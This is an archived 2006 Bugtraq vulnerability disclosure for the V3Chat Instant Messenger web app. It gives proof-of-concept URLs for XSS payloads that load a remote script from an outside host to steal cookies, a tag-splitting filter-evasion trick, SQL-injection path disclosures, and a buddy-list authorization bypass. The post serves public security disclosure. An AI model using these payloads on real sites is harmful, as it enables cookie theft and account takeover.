V3Chat Instant Messenger - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: V3Chat Instant Messenger - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 17 Jun 2006 22:01:52 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

V3 Chat Instant Messenger

http://www.v3chat.com/

Affected files:

/mail/index.php
/mail/reply.php
is_online.php
online.php
profile.php
profileview.php
search.php
mycontacts.php
expire.php

* Editing your profile:

- input boxes

------------------------------------------

Mail Vulnerabilities:

Full path disclosure via SQL injection on id when reading mail:

http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result 
resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17

XSS vuln with cookie disclosure:

We can bypass V3chats filters by using malformed img tags around out script 
tags. PoC:

http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">

Replying to mail XSS vulns:

http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">

---------------------------------------

Members online XSS vulns with cookie disclosure:

http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">


Same as above, on online.php:

http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></

SCRIPT>">

Adding members via Online.php Mysql error & full path disclosure:

http://www.example.com/messenger/online.php?action=update&membername='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result 
resource in /content/username/v/#/domain/web/messenger/online.php on line 5
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 
9:55 pm', '1150577732', '')' at line 1

-------------------------------------

Search.php XSS vuln:

http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">


Adding a member from search.php XSS vuln:

http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=
--------------------------------------

Same as above, this time on profile.php:

http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">

-----------------------------------

Same as above, on Profileview.php now:

http://www.example.com/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">

----------------------------------

XSS vuln with cookie disclosure when editing profile:

To bypass V3 chats filters we can use this XSS example. Credits to 
RSnake.Script tags wrapped around a document.write function that writes part of 
our second 

script tag.

<SCRIPT>document.write("<SCRI");</SCRIPT>PT 
SRC="http://youfucktard.com/xss.js";></SCRIPT>

-------------------------------

Mycontacts.php XSS vulns with user bypass.

It seems after you log in as a user youre able to put in any username in 
membername=  and it will navigate you to their buddylist. From there you can 
add, 

remove, chat with, etc people on their buddylist. etc.

PoC:
http://example.com/messenger/mycontacts.php?membername=putausername

-------------------------------

Expire.php XSS vuln:

http://example.com/messenger/expire.php?cust_name=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">

-----------------------------

Screenshots:
http://www.youfucktard.com/xsp/v3chat1.jpg
http://www.youfucktard.com/xsp/v3chat2.jpg
http://www.youfucktard.com/xsp/v3chat3.jpg
http://www.youfucktard.com/xsp/v3chat4.jpg
http://www.youfucktard.com/xsp/v3chat5.jpg
http://www.youfucktard.com/xsp/v3chat6.jpg
http://www.youfucktard.com/xsp/v3chat7.jpg
http://www.youfucktard.com/xsp/v3chat8.jpg
http://www.youfucktard.com/xsp/v3chat9.jpg
http://www.youfucktard.com/xsp/v3chat10.jpg

Prev by Date: Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks
Next by Date: Janus Contact
Previous by thread: Input Validation/Output Encoding Vulnerabilities in Cisco CallManager Allow Script Injection Attacks
Next by thread: Re: V3Chat Instant Messenger - XSS
Index(es):
- Date
- Thread